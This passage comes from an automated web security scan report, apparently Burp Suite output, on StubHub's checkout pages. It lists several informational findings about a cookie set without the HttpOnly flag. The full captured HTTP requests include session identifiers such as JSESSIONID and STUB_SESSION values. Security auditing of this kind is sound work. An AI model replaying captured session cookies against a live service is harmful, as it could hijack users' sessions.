STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:53 GMT
Server: Apache
Set-Cookie: TLTHID=E4093A0A39C110390346A44E82BE9735; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 1c55#1991/checkout/services/delivery@srwp01byx003.stubprod.com
com-stubhub-dye: 1c55#1991/checkout/services/delivery@srwp01byx003.stubprod.com
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Location: https://buy.stubhub.com/errorAjax.html
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


4.10. https://buy.stubhub.com/checkout/services/payment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/services/payment

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/services/payment HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:54 GMT
Server: Apache
Set-Cookie: TLTHID=E43BE44639C11039023DF003EA6CA026; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: c2c7#503/checkout/services/payment@srwp01byx010.stubprod.com
com-stubhub-dye: c2c7#503/checkout/services/payment@srwp01byx010.stubprod.com
Location: https://myaccount.stubhub.com/login/Signin
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


4.11. https://buy.stubhub.com/checkout/services/reviewSubmit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/services/reviewSubmit

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checkout/services/reviewSubmit HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:54 GMT
Server: Apache
Set-Cookie: TLTHID=E472A54439C1103903BEE205A91C2150; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 2f05#19ad/checkout/services/reviewSubmit@srwp01byx005.stubprod.com
com-stubhub-dye: 2f05#19ad/checkout/services/reviewSubmit@srwp01byx005.stubprod.com
Location: https://myaccount.stubhub.com/login/Signin
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


4.12. https://buy.stubhub.com/howToEnableJavaScript.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /howToEnableJavaScript.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /howToEnableJavaScript.html HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:42:54 GMT
Server: Apache
Set-Cookie: TLTHID=E4A3421C39C1103978D494000C1CF856; Path=/; Domain=.stubhub.com
Last-Modified: Tue, 16 Feb 2010 20:48:57 GMT
Accept-Ranges: bytes
Content-Length: 1064
Vary: Accept-Encoding
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>How to enable JavaScript</title>
<style
...[SNIP]...

4.13. https://buy.stubhub.com/modules/js/referdetect.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /modules/js/referdetect.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /modules/js/referdetect.js HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Tue, 17 Oct 2006 21:47:35 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Wed, 16 Feb 2011 12:12:18 GMT
Cache-Control: max-age=1800
Vary: Accept-Encoding
Set-Cookie: TLTHID=CEDDB7AA39C110393178904AB7E84BF7; Path=/; Domain=.stubhub.com


4.14. https://buy.stubhub.com/promotions/scratch/JS/myaccount-beta-perf-url-scraping-content-1.0.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/JS/myaccount-beta-perf-url-scraping-content-1.0.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/JS/myaccount-beta-perf-url-scraping-content-1.0.js HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Thu, 16 Sep 2010 00:19:32 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
